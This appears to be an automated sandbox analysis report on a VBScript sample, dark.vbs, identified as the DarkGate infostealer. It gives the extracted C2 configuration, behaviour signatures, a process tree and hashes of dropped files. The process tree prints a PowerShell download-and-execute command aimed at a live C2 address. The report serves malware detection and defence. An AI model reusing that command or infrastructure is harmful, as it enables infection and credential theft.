Overview

overview

10

Static

static

1

dark.vbs

windows7-x64

3

dark.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-03-2024 12:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dark.vbs

  • Size

    5KB

  • MD5

    3b2e1c5604f68a43495f3829c31f12e3

  • SHA1

    ddc0158fa56458c9235598fdbf2ff49d87c93bb1

  • SHA256

    ad806df85dfb29cca1f3a2c99ed069c30cd870bae9d47f2de4c7ce727b9622ec

  • SHA512

    853b8afbffbbf8a24639f27fd2ddd5b5713e85f7ddcd8a020a050ba40fcf391cf29aa047cfc335b69b5828b740f145b6b27b1149f07234817b991545b3ab38f6

  • SSDEEP

    96:DaUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0m:DaU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9I

Score
10/10
darkgatepruebasvbspersistencestealer

Malware Config

Extracted

Family

darkgate

Botnet

pruebasvbs

C2

149.56.252.31

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    mwsMGaLY

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    pruebasvbs

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 11 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3940
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3788
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3736
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dark.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '149.56.252.31:8094/mgmmrccw')
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\temp\AutoIt3.exe
          "C:\temp\AutoIt3.exe" script.a3x
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2448

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\bbchbhh\habbcbd.a3x
      Filesize

      468KB

      MD5

      f615af806a9d74b5512d27cc40ecac13

      SHA1

      53d4eae842670cde517d0ecbf7f29602ae3a2804

      SHA256

      6d977dfe2c8227a40bb15a8c61de7307de8f09d3c36ad6bedf51162a283b3200

      SHA512

      69f560491cff9f36d88590e25113f2dbf7bed8b07c45503cb036f58ece99d80e26580bc3ef9c1f7fe644e9abd76b5c256e7fd4185dac5e9615b33d167ec0c7f0

      Download Submit

    • C:\ProgramData\bbchbhh\kfbefdf
      Filesize

      1KB

      MD5

      48f1eb7047b38a15434719b91e15c54d

      SHA1

      96fb025fe59a59d5c165569854612633c6192ef8

      SHA256

      e2c4b73903586e4f2293e74b55edbfcbd4d55696362d19e730caedad3d7736ec

      SHA512

      0d40a23a8cd859096783d8fa3cd95f682a2b7fad01191a36a3b6748c784c0ee64d7ce8d063c9ea5083f668c59b86d10cf6afb8ca8db88fea325bde963b3150d8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vblciyjf.z3s.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\CaeDKGe
      Filesize

      32B

      MD5

      64c7060c88c4cf5447c4dfe8d96317e3

      SHA1

      3cf40488a556ea3524466089f45842f1e5cac53a

      SHA256

      bc026c0f0c355ded85e75c3f15b1eaad5be65d727b458bbbbd7a5042c2628c3c

      SHA512

      c7f158ee015dd1e7c729eee64fe77a85effbe26d1bf727d8d56f34efda1babb3752eaac3e23d8289b1f11f606f521a12499cdae9276a6d458e4918a2e3548072

      Download Submit

    • C:\temp\AutoIt3.exe
      Filesize

      872KB

      MD5

      c56b5f0201a3b3de53e561fe76912bfd

      SHA1

      2a4062e10a5de813f5688221dbeb3f3ff33eb417

      SHA256

      237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

      SHA512

      195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

      Download Submit

    • C:\temp\aaddddf
      Filesize

      4B

      MD5

      3ee6674c0e38402dd8ca5e134dfd494e

      SHA1

      6c019165e99d924ff521321d3193a5a4172cc3dd

      SHA256

      1512933308b0a6adf128e2dcf39a53cb0e373f5aa284ee803d7aab65e2a08dfa

      SHA512

      53d789280e0ad3be6d175c478a129720b3caa1d936eb5dddd7ea860aac39bfdf2f84a9cd492a9f8d94840f864d3cda8dd5236584503bf2e8ed6c41f5b05caec1

      Download Submit

    • C:\temp\aaddddf
      Filesize

      4B

      MD5

      c4aed02c53d676c8f5e452dca7d6fab7

      SHA1

      925ba57e7505a7f7bfe0e250c6abdcef092da2fc

      SHA256

      6df497859afb971b8f3b5f296b49ed63bfbc76dda73afb53bd068156de602b23

      SHA512

      e5e59fa83a2c11443fd2a7b9ee33de2de7cc63231c561a7c8563f6cd5203b7f2dfa0b99f9b829270c3e93625e1ff826ffd78aad631acc6b10321657438773589

      Download Submit

    • C:\temp\fbdcgeg
      Filesize

      4B

      MD5

      873bd2a70542edd8915e4c2dba0d4e98

      SHA1

      826e2db10ac48f0ed0af099f458f14aea275987d

      SHA256

      a53ae32c02606a8d278094117f483b13b44d37ebaa630a11628e50a9ae3db40f

      SHA512

      af4525c44cdec8deef881db8ea93134b80a2ced0720b66ddd4bcf71c46d5ed831db6b1515677ff9e6a289f10c286304deb2cadf5230ddc2d8a26d5d9a51f7630

      Download Submit

    • C:\temp\script.a3x
      Filesize

      467KB

      MD5

      50862376b34880a80a32406444f4a8cb

      SHA1

      20997faf801af300f4524b5a785d1f246bb79f49

      SHA256

      508251503639845117e170fe5ae1b0d7b8953e8336119a71d04e7bdce962d980

      SHA512

      c17fc05332ce333f3dcae3e6d0524386500953cb48e55996516913cdb9b415d4c940c59a8311efc31663ae4c6710f44b18ba63016cb9f100ffe8edf0985a0f7d

      Download Submit

    • C:\temp\test.txt
      Filesize

      76B

      MD5

      e12c09ed641531b7225b26ff6991a506

      SHA1

      697ec598b870b394d237b9bccf4eef18e1619ee5

      SHA256

      692f4ba2a4bce266d9228dd0a3e11a5cd2e4b201b5ce459eef64dcb9d043f73c

      SHA512

      8370d91bc0dc6c0e924e45658f6e62ec04d3f2654133c6799ab0e7f839a52556db4e04615dadda9fc97a88b3a18916e4fb286efccc6713b9a4e8cd8700915b83

      Download Submit

    • memory/2180-28-0x00007FFA89BE0000-0x00007FFA8A6A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2180-13-0x0000028337FD0000-0x0000028338192000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2180-12-0x000002831D460000-0x000002831D470000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2180-11-0x000002831D460000-0x000002831D470000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2180-9-0x0000028337830000-0x0000028337852000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2180-10-0x00007FFA89BE0000-0x00007FFA8A6A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2448-33-0x0000000004FE0000-0x0000000005FB0000-memory.dmp

      Filesize

      15.8MB

      Download

    • memory/2448-45-0x00000000064E0000-0x000000000682F000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2448-35-0x00000000064E0000-0x000000000682F000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3736-62-0x0000000002D10000-0x00000000034B2000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3736-54-0x0000000002D10000-0x00000000034B2000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3736-60-0x0000000002D10000-0x00000000034B2000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-44-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-56-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-57-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-55-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-61-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/3788-49-0x00000000028D0000-0x0000000003072000-memory.dmp

      Filesize

      7.6MB

      Download